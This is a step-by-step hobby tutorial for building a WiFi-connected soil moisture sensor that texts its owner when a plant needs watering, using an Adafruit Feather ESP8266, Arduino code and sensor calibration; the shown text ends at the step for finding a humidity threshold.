The above code pattern matches on this, which refers to the current List object. The first case matches the head and tail of the Cons data constructor; when it matches, it takes the head and recursively calls sumAll on the remaining tail, which is also a List. When the list is Nil (the empty list), the recursion stops and 0 is returned.
Another ProductAll method in trait
def productAll: Int = this match {
  case Cons(h, t) => h * t.productAll
  case Nil => 1
}
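For readers without a Scala toolchain handy, the same Cons/Nil recursion can be sketched in Python using nested pairs (illustrative only; Scala's pattern match becomes an explicit head/tail unpacking):

```python
# Nil is the empty list; cons(head, tail) plays the role of Cons(head, tail).
Nil = None

def cons(head, tail):
    return (head, tail)

def sum_all(lst):
    if lst is Nil:          # case Nil => 0
        return 0
    head, tail = lst        # case Cons(h, t) => h + t.sumAll
    return head + sum_all(tail)

def product_all(lst):
    if lst is Nil:          # case Nil => 1
        return 1
    head, tail = lst        # case Cons(h, t) => h * t.productAll
    return head * product_all(tail)

nums = cons(1, cons(2, cons(3, Nil)))
assert sum_all(nums) == 6
assert product_all(nums) == 6
```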
Below is the complete code snippet.
Originally published at shadamez.wordpress.com on May 13, 2015. | https://medium.com/@shadamez/pattern-matching-and-recursion-in-scala-1b04294c8232 | CC-MAIN-2018-47 | refinedweb | 493 | 63.49 |
How can we find the absolute value of a float variable, since abs() gives a warning of data loss?
Is abs() a member of std? I think it's not.

Quote:
Originally posted by vVv
Code:
#include <cmath>
...
float foobar = -1.23;
foobar = std::abs( foobar );
And does anybody know why the compiler gives that warning?
If you include cmath, the abs function is in the std namespace. I don't see anything wrong with it.
I asked about this because when I compiled the following code (using MS VC++ 6), I got the errors and warnings quoted below.

Code:
#include <cmath>

int main()
{
    float foobar = -1.23;
    foobar = std::abs( foobar );
    return 0;
}
Thanks in advance...

Quote:
--------------------Configuration: Cpp2 - Win32 Debug--------------------
Compiling...
Cpp2.cpp
C:\Documents and Settings\Ammar\My Documents\C++\Cpp2.cpp(6) : warning C4305: 'initializing' : truncation from 'const double' to 'float'
C:\Documents and Settings\Ammar\My Documents\C++\Cpp2.cpp(7) : error C2653: 'std' : is not a class or namespace name
C:\Documents and Settings\Ammar\My Documents\C++\Cpp2.cpp(7) : warning C4244: 'argument' : conversion from 'float' to 'int', possible loss of data
C:\Documents and Settings\Ammar\My Documents\C++\Cpp2.cpp(7) : warning C4244: '=' : conversion from 'int' to 'float', possible loss of data
Error executing cl.exe.
Cpp2.exe - 1 error(s), 3 warning(s)
>using MS VC++ 6
That's your problem, VC++ 6 doesn't conform to the latest standard properly.
-Prelude
Thanks a lot, vVv and Prelude...
Now it's clear...
The abs( ) function takes an integer number and returns an integer value. You want to use the function fabs( ), which takes a double and returns a double.
Alternatively, you can use fabs() defined in math.h, which was created specifically for floating point arguments.
Red Hat Bugzilla – Bug 36539
sort goes into infinite loop with LC_ALL unset
Last modified: 2016-11-24 10:08:10 EST
From Bugzilla Helper:
User-Agent: Mozilla/4.77 [en] (X11; U; Linux 2.2.16-3 i686)
For specific input files (see attached file), the sort utility will go into
an infinite loop. I first noticed this problem when sorting a 404MB file,
and managed to reproduce the problem with a smaller input file using the
"-S 4" option. When I set LC_ALL=C, the problem does not appear.
Reproducible: Always
Steps to Reproduce:
1. Execute "sort -S 4 test1 -o test1.output" (program hangs--you can
examine temp files)
2. Execute "LC_ALL=C sort -S 4 test1 -o test1.output" (program is slow,
but finishes)
3.
Actual Results: For step 1, nothing happens.
For step 2, the sort utility finishes as expected.
Expected Results: The sort utility should finish successfully in both
cases.
I get the following when I interrupt the sort utility in gdb:
(gdb) cont
Continuing.
Program received signal SIGINT, Interrupt.
0x400a33a9 in strcoll () from /lib/libc.so.6
(gdb) where
#0 0x400a33a9 in strcoll () from /lib/libc.so.6
#1 0x0804ef62 in memcoll (s1=0x8057000 "0-0-0-0-0-0-0-0-0-0.COM.",
s1len=25,
s2=0x8056f78 "00000-00000.COM.", s2len=17) at memcoll.c:44
#2 0x0804b73a in compare (a=0x8057060, b=0x8056fd8) at sort.c:1410
#3 0x0804be3e in mergefps (fps=0xbfffd6c0, nfps=16, ofp=0x8056e08,
output_file=0x8057280 "/tmp/sortnm2z9d") at sort.c:1583
#4 0x0804c7c4 in merge (files=0x8056980, nfiles=288, ofp=0x8056810,
output_file=0xbffffc04 "zxcv") at sort.c:1758
#5 0x0804cd45 in sort (files=0x80567ac, nfiles=-1, ofp=0x8056810,
output_file=0xbffffc04 "zxcv") at sort.c:1863
#6 0x0804e231 in main (argc=6, argv=0xbffffabc) at sort.c:2459
#7 0x4003a237 in __libc_start_main () from /lib/libc.so.6
(gdb) Quit
Created attachment 15664 [details]
Test input file for sort failure
problem is still in textutils-2.0.13-1
Seems to be a problem with the strcoll() function.
Consider the following program:
#include <stdio.h>
#include <string.h>
#include <locale.h>
int main( int argc, char *argv[] )
{
char *t1 = "0-0-0-0-0-0-0-0-0-0.COM";
char *t2 = "00000-00000.COM";
setlocale( LC_ALL, "" );
printf( "strcoll( \"%s\", \"%s\" ) = %d\n", t1, t2, strcoll( t1, t2 ) );
printf( "strcoll( \"%s\", \"%s\" ) = %d\n", t2, t1, strcoll( t2, t1 ) );
}
Yields the output:
strcoll( "0-0-0-0-0-0-0-0-0-0.COM", "00000-00000.COM" ) = 1
strcoll( "00000-00000.COM", "0-0-0-0-0-0-0-0-0-0.COM" ) = 4
So when the sort utility is trying to merge the temporary files together in
mergefps(), it keeps swapping the same two entries corresponding to the test
samples above, as the first argument will ALWAYS be considered "greater" than
the second one, regardless of the order they are passed.
Will go digging through glibc unless someone else finds this one first...
I've checked into the CVS archive a patch to fix this problem. The fixed version will be in 2.2.3.
Can this be included if an errata RPM is made of glibc-2.2.2? This affects lots
of other utilities in addition to "sort" like "ls", etc., etc.
It's fixed in rawhide and will be in the glibc errata we'll release in a while.
https://bugzilla.redhat.com/show_bug.cgi?id=36539
A while back, I was looking for a data structure that could store strings quickly and retrieve them very quickly. I stumbled upon the Patricia (PAT) trie ("Practical Algorithm To Retrieve Information Coded in Alphanumeric"). Unfortunately, I could not find a good enough explanation of the trie. Every explanation I read glossed over too many details. Every code piece (there are not many) that I could find had a very nice implementation, but stored only numbers, not text. So, I wrote my own class that stores text.
If you want to store a good amount of unique text strings (duplicates can be handled, just not by the class itself), retrieve them super fast, and associate data or functions with them, then read on!
This class could be used for (as examples, but not limited to):
Not bad, huh?
I would like to give a brief overview of what a trie is and then speak about PAT tries more specifically. It is assumed you understand how a binary tree works.
A trie is a binary tree that uses key space decomposition (as opposed to object space decomposition). The idea is that instead of branching left or right based on what data value happens to be at a particular node in the tree (that is not a mistake, tries are trees), we branch based on predefined key values. So the root node of a tree could send the first thirteen letters of the alphabet to the left child while the others go to the right. This does not guarantee a balanced tree, but it helps to keep the tree balanced and ensures that the order in which data is input will not affect the performance of the data structure (i.e., insert a sorted list into a binary tree and end up with a list).
In a PAT trie, all of the internal nodes (a node with at least one child) hold only enough information to make branching decisions (go left or right), but no actual data. The leaves of the trie (a node with no children) hold the data: a key and a link to one class (that holds whatever we need it to).
My PAT trie uses integers (on a 32-bit machine) for keys. If you want to use a long for the key, then you must change the type of the key (keyType). If you change the type of the key or you compile this class on a machine that encodes integers (int) with more than 32 bits, then you must set the constant MAX_KEY_BITS to the number of bits that your data type is wide (default is 32). We will see later how to convert text to integers.
With PAT tries, at every level of the trie, we evaluate one bit of the key, and based on that bit, move left or right. To find any key in our trie, we only have to check at most the number of bits that our key is wide (32 bits).
The image above shows a PAT trie that stores a few keys (binary representation shown). The black circles are internal nodes. The yellow circles are leaf nodes.
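The bit-test walk described above can be sketched as follows. The node layout and names here are illustrative, not the article's actual PatriciaNodeC:

```cpp
#include <cstdint>

// Minimal sketch of key-space branching: at depth `level` we test one bit of
// the key and go left or right. Internal nodes hold no data; leaves do.
struct Node {
    int level;     // which key bit this internal node tests; -1 marks a leaf
    Node* left;
    Node* right;
};

inline bool bitAt(uint32_t key, int level) {
    return (key >> (31 - level)) & 1u;   // level 0 tests the most significant bit
}

Node* descend(Node* n, uint32_t key) {
    while (n->level >= 0)                      // internal node: branch on one bit
        n = bitAt(key, n->level) ? n->right : n->left;
    return n;                                  // leaf: compare the full key here
}
```

Since each level consumes one bit, the walk terminates after at most 32 comparisons for a 32-bit key.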
Now, we turn our attention to making this a useful PAT trie. We need a way to turn a string of text into our key. All of the three methods described below are based on the fact that Unicode or ASCII characters are really just numbers. The character 'a' is also 97.
The first method involves converting all of our characters into 8-bit numbers (a byte) and concatenating them. There are only 26 letters in the alphabet; we can represent them with a byte. This is not a very good solution, because we could only discriminate against four letters (4 letters * 8 bits = 32 bits). Also, most of the branching would be on the same characters (eight bits to store an ASCII character, eight identical internal node checks).
The second method allows us to store more letters in our key. We could add our characters ('a' + 'e' + ... = 4532). In this way, with the largest ASCII character being no more than 255 (2^8-1) or in Unicode 65535 (2^16-1), we could have our key encode many numbers and we would not be wasting space on comparing eight internal nodes for one character. This method has one fatal flaw: encoding "was" or "saw" we will get the same number (3 + 5 = 5 + 3).
The last method uses a Huffman code. Huffman codes are primarily used for compression. They encode letters in a new format using the least amount of bits possible by assigning the least number of bits to the most frequent character. So, if 'e' is the most common letter in a document, then we will represent 'e' with a zero (or just one bit). We would represent the next most frequent letter with a one and the third most frequent with a two. In this way, the Huffman code saves the most space of the three methods, by replacing the most frequent letter with the smallest representation.
Please note that with any of these three methods, there is no guarantee that the generated key will be unique. If all of the letters are identical until the point where our key is full (we have represented as many characters as possible), then we will have generated the same key for two distinct strings ("a baby ate the fox" and "the baby ate the fox" will translate to the same key). To ease this issue, use a key with greater than 32 bits. With a 32 bit key, we can represent at most 32 characters (provided those characters can be represented by one bit ~ 32 e's or t's).
The Huffman code used in my PAT trie is an array of twenty-six numbers. The first cell holds the Huffman code for the letter 'a', the next cell for 'b', and so on. The code stored in each cell is the reduced bit representation of the corresponding letter. For instance, the fifth cell is for 'e' and holds the number zero. 'e' is the most frequent letter in the English alphabet and so should map to the smallest number. To build our key:
To better explain the last three steps, here is an example:
How was the decision made that the letter 'e' is the most frequent and 'z' is the twenty-third most frequent? Initially, I wrote a program to mill through text and produce a list of the most frequent letters in the English alphabet. Fortunately, it was brought to my attention (by Don Clugston - on Code Project) that there is an official list of the most frequent letters. I should have thought of that... Regardless, the code has been updated and kudos/thanks to Don! The change will improve the speed of the code. Note that if you use this class to store command lists or some type of structured document where the same words are being used over and over, it pays to rearrange the frequency to match the most frequently used letters. If you were storing C programming code, then if and while would crop up quite a bit. The most frequent letter should (possibly) be i.
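A sketch of deriving each letter's code from its rank in a frequency order. The string below is the order quoted in the article's code comment; values for letters beyond the published excerpt (A-E) follow that order and are an assumption. Swapping in a domain-specific ordering is just a matter of changing the string:

```cpp
#include <cstring>

// Frequency order from the article's comment: most frequent letter first.
static const char* kFreq = "etaoinsrhldcumfpgwybvkxjqz";

// Returns the reduced-bit code for a letter, or -1 for characters the
// trie skips (anything outside A-Z, case-insensitive).
int codeFor(char c) {
    if (c >= 'A' && c <= 'Z') c += 'a' - 'A';          // fold to lowercase
    const char* p = std::strchr(kFreq, c);
    return p ? static_cast<int>(p - kFreq) : -1;       // rank == code
}
```

So codeFor('e') is 0 (one bit) while codeFor('z') is 25, matching the idea that the most frequent letter gets the smallest representation.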
What if you Huff duplicates? My PAT trie is set up so that you associate an entire class with a key. It will only store a key once, but the class associated with it could remember information about duplicates. For instance, here are three scenarios:
There are three classes that together create my Patricia Trie:
PatriciaTrieC
PatriciaNodeC
ASSOCIATED_CLASS (PayloadC)
The Huffman code array is a static member of the PatriciaTrieC class. It is initialized once for the class and available for all objects of PatriciaTrieC. If you want to change the values, you will have to go in and tweak the array itself.
//STATIC HUFFMAN CODE - ONLY CREATED ONCE
//*****************************************************************
//build huffman tree
//based on common letter usage in the English language
//source: UNIX manual pages (find, ls, mv, cp, ...) all added together
//
//e t a o i n s r h l d c u m f p g w y b v k x j q z
//
char PatriciaTrieC::huffman_code [] =
{
/* A-D */
2, //A
18, //B
11, //C
10, //D
/* E-H */
0, //E
The code that Huffs text to keys will ignore all characters that are not A through Z (case-insensitive). So, the strings "HAPPY" and "H A P P Y" would Huff to the same key. Also note that the character strings should be terminated by the end of string character ('\0' or zero).
//convert text to integer
do
{
//if we get to the end of the text string
//before the key is filled that is okay
//we will just use what we have!
if (txt [txt_count] == END_OF_STRING)
break;
//if lowercase, then make it uppercase
if (txt [txt_count] >= 'a' && txt [txt_count] <= 'z')
txt [txt_count] -= LOWER_TO_UPPER_FACTOR;
//skip all weird characters (only normal letters are handled)
if (txt [txt_count] < 'A' || txt [txt_count] > 'Z')
{
//go to next character
txt_count += 1;
//try next character
continue;
}
.
.
.
You can insert, search, and remove a key (or one data element) out of the trie. There is a method BuildKey that you can use to convert text into keys if you wanted to store or find out the exact key signature for a string of text. You can also call Print to print the entire trie (if DEBUG is set) or Clear to wipe the entire trie.
The class associated with every leaf node (where data is stored) is PayloadC. If you want your own class, just change the constant ASSOCIATED_CLASS in the pat.h file to the name of your class.
The included project has a nice little program that loads words from a text file and inserts, searches and then removes them all. Below is a simple example of those three operations (insert, search, remove):
#include "pat.h"
#include <iostream.h>
int main ()
{
//CREATE VARIABLES
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//create two associated classes
PayloadC* p_dyn = new PayloadC ();
PayloadC p_stc;
//for getting returns on associated class from remove and search
PayloadC* catch_payload = NULL;
//the PAT trie
PatriciaTrieC pat;
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//insert HAPPY and search for it
//////////////////////////////////////////////////
if (pat.Insert (p_dyn, "HAPPY"))
cout << "inserted HAPPY" << endl;
else
cout << "did not insert HAPPY" << endl;
catch_payload = pat.Search ("HAPPY");
//insert SAD and search for it
//////////////////////////////////////////////////
if (pat.Insert (&p_stc, "SAD"))
cout << "inserted SAD" << endl;
else
cout << "did not insert SAD" << endl;
catch_payload = pat.Search ("SAD");
//////////////////////////////////////////////////
catch_payload = pat.Search ("WHO");
if (!catch_payload)
cout << "WHO does not exist" << endl;
//REMOVE EVERYTHING, WHO WILL NOT BE REMOVED
//////////////////////////////////////////////////
catch_payload = pat.Remove ("HAPPY");
catch_payload = pat.Remove ("SAD");
catch_payload = pat.Remove ("WHO");
return 0;
}
The word frequency list I used came from here.
The PAT trie with a 32 bit key can store (2^32-1) / 2 = 2,147,483,647 words and find any of them in 32 bit comparisons.
This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.
A list of licenses authors might use can be found here
class PayloadC
{
private:
public:
char foo[128];
PayloadC () {}
~PayloadC () {}
};
STDMETHODIMP Patricia::Search(BSTR sData, VARIANT_BOOL *bResult)
{
USES_CONVERSION;
LPSTR saData = W2A( sData );
PayloadC* p;
*bResult = ( ( p = pat.Search(saData) ) != NULL ) ? VARIANT_TRUE : VARIANT_FALSE;
// cout << p->foo;
return S_OK;
}
For i = 0 To UBound(a) - 1
tag = a(i)
Debug.Print "'" & tag & "'"
If Not b.Insert(tag) Then
fc = fc + 1
Else
If b.Search(tag) Then
xc = xc + 1
End If
sc = sc + 1
End If
Next
ISNER ( 100 1110 1111 0 11110 ) 80862
LONER ( 1001 110 1111 0 11110 ) 80862
ANDRLE ( 10 1010 11110 11000 101101 0 ) 5631066
ANDRY ( 10 1010 11110 11000 1011010 ) 5631066
ISNER ( 100 111 101 0 110 ) 5078
LONER ( 1001 11 101 0 110 ) 5078
ANDRLE ( 10 101 1010 110 1001 0 ) 88786
ANDRY ( 10 101 1010 110 10010 ) 88786
option explicit
dim sHuff
dim aHuff
sHuff = "2,19,11,10,0,14,16,8,4,23,21,9,13,5,3,15,24,6,7,1,12,20,17,22,18,25"
aHuff = split(sHuff,",")
translate "ISNER"
translate "LONER"
translate "ANDRLE"
translate "ANDRY"
sub translate( sFrom )
dim i
dim c
dim n
dim huff
dim t
t = ""
for i = 1 to len( sFrom )
c = mid( sFrom, i, 1 )
n = asc(c) - asc("A")
huff = aHuff(n) * i
'wscript.echo c,n,aHuff(n),i,huff,hex(huff)
t = t & getbinary(huff) & " "
next
wscript.echo sFrom, "( "&t&")", getinteger(t)
end sub
'binary functions adapted from
Function GetInteger(sBinary)
' Returns the integer that corresponds to a binary string of length 8
Dim iRet
dim i
dim s
' Remove any spaces
s = Replace(sBinary, " ", "")
iRet = 0
For i = 0 To Len(s) - 1
iRet = iRet + 2 ^ i * CInt(Mid(s, Len(s) - i, 1))
Next
GetInteger = iRet
End Function
Function GetBinary(iInput)
' Returns the 8-bit binary representation
' of an integer iInput where 0 <= iInput <= 255
Dim s
dim i
If iInput < 0 Or iInput > 255 Then
GetBinary = ""
Exit Function
End If
s = ""
while iInput > 0
s = CStr(iInput Mod 2) & s
iInput = iInput \ 2
wend
if s = "" then s = "0"
GetBinary = s
End Function
http://www.codeproject.com/Articles/8762/Patricia-and-Huffman-Sitting-in-a-Trie?fid=125303&df=90&mpp=25&noise=3&prof=True&sort=Position&view=None&spc=None&select=2110152&fr=1
Objective-J and Cappuccino Released 56
Wizard Drongo writes "280 North, who earlier this year released 280 Slides, a revolutionary new type of web-app written in Objective-J using the Cappuccino framework (both of which they also wrote), have today made good on their promise to open-source the language and framework. From their about page: 'Cappuccino is an open source application framework for developing applications that look and feel like the desktop software users are familiar with. Cappuccino was implemented using a new programming language called Objective-J, which is modeled after Objective-C and built entirely on top of JavaScript. Programs written in Objective-J are interpreted in the client, so no compilation or plugins are required. Objective-J is released alongside Cappuccino in this project and under the LGPL.' You can download the framework, tools, documentation and more on their website."
Hmmm.... (Score:4, Funny)
...and JJ (Score:1)
Dy-no-mite!
Re: (Score:3)
Confusing (and unappealing) names seem to be part of the software landscape. The important part of the announcement is that they open sourced the language and framework. Free software gains another set of tools. This is a Good Thing. Props to 280 North.
Re: (Score:1)
Re: (Score:2)
Somewhere on my list of "things to do when I get a time machine":
Find the Netscape and Sun marketroids who coined the name "JavaScript" and kick them all in the gender-appropriate gonads before they do it.
Re: (Score:2)
Re:Hmmm.... (Score:4, Informative)
Re: (Score:3, Funny)
Re: (Score:3, Informative)
I have never used J and know nothing about J
Rest assured that those who have and do mostly run away screaming...
*looks askance at those who like J*
Those who do *NOT* run away screaming are probably likely to prefer developing Java in notepad, think perl is a good application framework and partake in usenet arguments about usable GIMP is.
What? Me bitter?
Leave GIMP out of this. (Score:2)
But everything else you mentioned holds true. Or at least it seems as if it could.
Re: (Score:2)
GIMP is usable now
As a discriminating individual perhaps I can interest you the first part of our fascinating lecture series on the J language?
Re: (Score:2)
Re: (Score:2)
{{y@&x'y}[{&/x-l*_x%l:2_!x}]3_!x}50
3 5 7 11 13 17 19 23 29 31 37 41 43 47
that's primes < 50 (fairly naively, i'll admit)
Re:Hmmm.... (Score:5, Insightful)
Would you have preferred Visual Objective-J++.Net 3.0b MSDN Edition?
The name is not bad. The main thing it does to me is imply Objective-C heritage which is what it is supposed to do. The J could be confused with Java though. Objective-JS would have cleared that up, but then it doesn't sound nearly as close to Objective-C.
This is all the fault of that decision long ago to name JavaScript after Java for marketing reasons.
I'd suggest Objective-ECMA, but that sounds like the test for a skin rash.
PS: What's with the "nod" tags today?
Objectivism (Score:5, Funny)
Maybe they could call it Objectivism.
Or Atlas.
*shrug*
Re: (Score:2)
So it would be: Visual Objective J# 2008 Team Edition for Rich Internet Application Developer, Service Pack 1.
Re: (Score:1)
And for their next trick: (Score:4, Funny)
Re: (Score:3, Interesting)
If it's as cool as their online presentation application, I'll actually be a tiny bit excited. The newest browsers actually run 280slides.com [280slides.com] pretty well. Safari is acceptable and Chrome actually screams.
For the love of God, please don't run it in IE.
Re:And for their next trick: (Score:5, Informative)
I just tried that, and it's hellishly slow in IE6, but runs like shit off a shovel in Firefox 3.
I haven't tried Chrome yet, but I'm guessing the shovel in that case will be chrome as well.
One thing that did piss me off was the "Download and Present" slide, which reminded me that Powerpoint 2007 format is "an ISO standard". While true, such statements are prone to making me quite irate
:P
Re: (Score:2)
What?
280Slides runs noticeably better for me in FF 3.0.1 than in Chrome. Thats with 2 tabs open in FF and 0 in Chrome.
Re: (Score:1)
Re: (Score:2)
You're right - it does look ripped right from Apple. But I opened up Keynote and 280Slides side-by-side, and it is clear they've only copied the "look and feel", but they haven't copied any of the icons.
I don't think they have any intention of making applications look "native". The applications will look exactly the same one every browser on every OS - at least in theory. Since they modeled it on OpenStep, it ends up looking very NeXT/Apple Cocoa.
Re: (Score:2)
they'll make yet another online spreadsheet application! I can hardly contain myself!
Nay sayer! Besides, spreadsheets are so passe. They will be actually bring back Lotus Improv, a program that was ahead of its time.
Re: (Score:2)
they'll make yet another online spreadsheet application! I can hardly contain myself!
Nay sayer! Besides, spreadsheets are so passe. They will be actually bring back Lotus Improv, a program that was ahead of its time.
If only Numbers could duplicate what Improv did on NeXTSTEP, then it would be something that could truly threaten Microsoft.
Re: (Score:3, Insightful)
Years and years ago, when I was working for a mainframe timeshare outfit and was teaching myself to program, one of the technicians said to me "Why do you want to do that? All the software anybody needs has already been written."
You remind me a little of that guy.
Re: (Score:3, Funny)
Re: (Score:2)
I don't think that Lotus Symphony was... it was WAY different than 1-2-3, Excel, QuattroPlus, et al...
Re: (Score:2)
Doh! It was Lotus Improv that was way ahead of its time...
Re: (Score:2)
I don't think that Lotus Symphony was... it was WAY different than 1-2-3, Excel, QuattroPlus, et al...
It's Quattro Pro and it was far superior to Excel, especially for us traditional Engineering majors [ME/EE/ChemE, et.al].
Re: (Score:2)
Re: (Score:2)
What about VisiCalc. You're not saying it was really written by John Titor in a previous trip are you?
Re: (Score:3, Interesting)
This framework and language offer nothing new nor a compelling reason to use them. So your comparison is bad and your point is an attempt to look clever while failing to understand the wasted time and effort. I worked for years as a sysadmin, in a company with much more experience and talent (than these guys) while attempting to do what this framework is still trying to do. It takes about 1/10th the time and effort to create a BETTER flash app to anything that can be developed with these heavy JS framework
Re: (Score:1)
Re: (Score:2)
Apparently it takes quite a bit of time and effort to create a flash app that doesn't crash on Linux, since I haven't seen one yet...
Re: (Score:2)
No joking. Could this "280slides" site be more of a ripoff of Powerpoint? I doubt it.
Oh, and the default font is Comic Sans. That alone makes it worthy of derision.
Breakfast (Score:2, Funny)
Re: (Score:2)
Re: (Score:2)
My guess is guys stuck in marketing meetings and waiting for lunch.
The Library is the Story (Score:5, Interesting)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
You know what, I'm wrong about that I think. I'm just going to shut up and keep reading.
Now where's the fun in that?
Re: (Score:2)
Keeping the NS in place allows programs from NeXTSTEP to be recompiled on OS X without modification. Win.
Besides, what do we change it to? 'X' implies the X Window System. 'OSX'? How about what happens when Mac OS 11.0 comes out?
If it ain't broke...
Re: (Score:2)
OS X + 1 = OS XI
I can't wait for it to rival Rocky or the Super Bowl.
Re: (Score:2)
It kind of is "broke". The only reason to have initials prefixing class names is because Objective-C doesn't support namespaces - or at least it didn't the last time I fooled around with it.
Re: (Score:2)
Re:The Library is the Story (Score:4, Interesting)
Just what we need... (Score:1)
Oh and coffee too.
Re: (Score:1)
Ah, well, in that case, maybe someone should be working on implementing a Perl interpreter in Objective-J...
Is it just me... (Score:1)
...or would a right-click context menu not complete 280's otherwise very useful Slides program?
https://developers.slashdot.org/story/08/09/05/1443248/objective-j-and-cappuccino-released?sdsrc=next
nghttp2_submit_response
Synopsis
#include <nghttp2/nghttp2.h>
int nghttp2_submit_response(nghttp2_session *session, int32_t stream_id, const nghttp2_nv *nva, size_t nvlen, const nghttp2_data_provider *data_prd)
Submits response HEADERS frame and optionally one or more DATA frames against the stream stream_id.
The nva is an array of name/value pairs nghttp2_nv with nvlen elements. The application is responsible to include required pseudo-header fields (header field whose name starts with ":") in nva and must place pseudo-headers before regular header fields.
This function creates copies of all name/value pairs in nva. It also lower-cases all names in nva. The order of elements in nva is preserved. For header fields with nghttp2_nv_flag.NGHTTP2_NV_FLAG_NO_COPY_NAME and nghttp2_nv_flag.NGHTTP2_NV_FLAG_NO_COPY_VALUE set, header field name and value are not copied respectively. With nghttp2_nv_flag.NGHTTP2_NV_FLAG_NO_COPY_NAME, the application is responsible to pass the header field name in lowercase. The application should maintain the references to them until nghttp2_on_frame_send_callback or nghttp2_on_frame_not_send_callback is called.
HTTP/2 specification has requirement about header fields in the response HEADERS. See the specification for more details.
If data_prd is not NULL, it provides data which will be sent in subsequent DATA frames. This function does not take ownership of the data_prd. The function copies the members of the data_prd. If data_prd is NULL, HEADERS will have END_STREAM flag set.
This method can be used as normal HTTP response and push response. When pushing a resource using this function, the session must be configured using nghttp2_session_server_new() or its variants, and the target stream denoted by the stream_id must be reserved using nghttp2_submit_push_promise().
To send non-final response headers (e.g., HTTP status 101), don't use this function because this function half-closes the outbound stream. Instead, use nghttp2_submit_headers() for this purpose.
This function returns 0 if it succeeds, or one of the following negative error codes:
nghttp2_error.NGHTTP2_ERR_NOMEM
Out of memory.
nghttp2_error.NGHTTP2_ERR_INVALID_ARGUMENT
The stream_id is 0.
nghttp2_error.NGHTTP2_ERR_DATA_EXIST
DATA or HEADERS has been already submitted and not fully processed yet. Normally, this does not happen, but when the application wrongly calls nghttp2_submit_response() twice, this may happen.
nghttp2_error.NGHTTP2_ERR_PROTO
The session is client session.
Warning
Calling this function twice for the same stream ID may lead to program crash. It is generally considered a programming error to commit a response twice.
https://nghttp2.org/documentation/nghttp2_submit_response.html
Introduction: Internet of Dirt: a Texting Plant
Do you struggle to keep your plants alive? Looking to get started with an IoT project? Why not have your plants text you when they need watering?
This simple project combines a capacitive soil sensor, the WiFi-enabled Adafruit Feather HUZZAH ESP8266 board, Adafruit IO, and IFTTT to set up a system that will text you when your plant's soil gets too dry. It makes a great intermediate-level Arduino project, or a good introduction to Internet of Things-style projects.
Materials list
- Adafruit Feather HUZZAH ESP8266
- USB cable
- Breadboard
- Male-to-male jumper wires
- 330Ohm resistors
- DF Robot corrosion-resistant soil sensor
- A plant
- A cup of water
Skills required
- Soldering
- Breadboarding
- Basic Arduino programming
This first appeared as a class co-taught by Bonnie Eisenman and Maya Kutz at NYC Resistor. For future iterations of the class, keep an eye on our Eventbrite listings.
Step 1: Install Arduino IDE, USB Drivers, and ESP8266 Board Package
There's a bunch of software you'll want to install for this to work. Let's get started!
Install the Arduino IDE.
Install the required USB drivers.
Install the ESP8266 board package for Arduino. You can do this by opening the Arduino IDE's preferences menu (in version 1.6.4 or above - update the IDE if necessary), then adding the URL:
into the field Additional Board Manager URLs. (See photo above.)
Then go to Tools -> Board -> Board Manager, and search for "esp8266". Install the ESP8266 package.
Restart the Arduino IDE.
Step 2: Install the MQTT Library
In the Arduino IDE, go to Sketch -> Include Library -> Manage Libraries. Search for "Adafruit MQTT" and install the Adafruit MQTT Library.
Restart the Arduino IDE.
Step 3: Test Your Feather With the Blink Program
OK, now that we've installed a bunch of software, let's ensure that your Feather is working properly.
The Adafruit Feather HUZZAH is an Arduino-compatible microcontroller with a built-in WiFi chip. It's therefore pretty useful for WiFi-enabled electronics projects.
Plug your Feather into your computer, and run the following program. The onboard LED should blink. Try changing the timing of the blinking, too, to ensure that your program is being run correctly.
void setup() {
  Serial.begin(115200);
  pinMode(0, OUTPUT);
}

void loop() {
  Serial.println("Hey! I'm in a loop!");
  digitalWrite(0, HIGH);
  delay(500);
  digitalWrite(0, LOW);
  delay(500);
}
Why does this work? On the Feather HUZZAH, there's an LED connected to pin 0. By writing HIGH and then LOW signals to that pin, we also cause the LED to blink.
Step 4: Solder Up Your Feather
Time to solder up your Feather so we can use it with the soil sensor. You have two options here.
Option 1 (for intermediate students):
Solder the included headers to your Feather. This way it'll be easier to use your Feather in future projects.
Option 2 (for beginners):
- Solder a black wire to GND
- Solder a red wire to 3V
- Solder a blue wire to ADC
Step 5: Take a Look at Your Soil Sensor
Before we wire everything up, let's take a look at the soil sensor.
Your soil sensor has three pins: one for power, one for ground, and one for signal.
The electronics on top of your sensor are not waterproof! Be careful not to short your sensor while testing it. The line at the top marks where you can submerge it.
Step 6: Wire Up Your Soil Sensor
Wire up your soil sensor according to the Fritzing diagram above.
For beginners, here's the text version:
- Connect the black wire on your Feather to the ground rail of your breadboard
- Connect the GND pin of your soil sensor the ground rail of your breadboard
- Connect the red wire on your Feather to the power rail of your breadboard
- Connect the VCC pin of your soil sensor to the power rail of your breadboard
- Connect the blue wire on your Feather to row 5 of your breadboard
- Place a resistor between row 5 of your breadboard and the ground rail
- Place a resistor between rows 5 and 10 of your breadboard
- Connect the SIG pin of your soil sensor to row 10 of your breadboard
Step 7: Test Your Soil Sensor
Upload the following code using the Arduino IDE:
int inputPin = A0;

/* The default dry and wet values for the sensor are 520 and 260 (no voltage divider).
 * To calibrate your sensor, run this code and open the Serial Monitor.
 * Record the value being measured as your new "dry" value.
 * Insert the sensor to the white line in a cup of water. Record the new reading as the "wet" value.
 */
const int dryVal = 567;
const int wetVal = 367;

int sensorVal = 0; // initialize value for sensor readings

void setup() {
  Serial.begin(115200);
}

void loop() {
  sensorVal = analogRead(inputPin);
  Serial.print("Sensor Value: ");
  Serial.println(sensorVal);
  Serial.print("Relative humidity: ");
  // calculate RH assuming a linear relationship between sensor readings and soil moisture level
  Serial.print(100 * (dryVal - sensorVal) / (dryVal - wetVal));
  Serial.println("%");
  Serial.println();
  delay(1000);
}
Record the sensor value while your sensor is dry. Then, insert the sensor into a cup of water, and record the value when the sensor is wet. Replace the default values for dryVal and wetVal in the code accordingly, and then re-upload the Arduino sketch.
Step 8: Grab a Plant and Find Your Humidity Threshold
Now, grab a plant. It should be in need of watering. Insert the soil sensor into the soil.
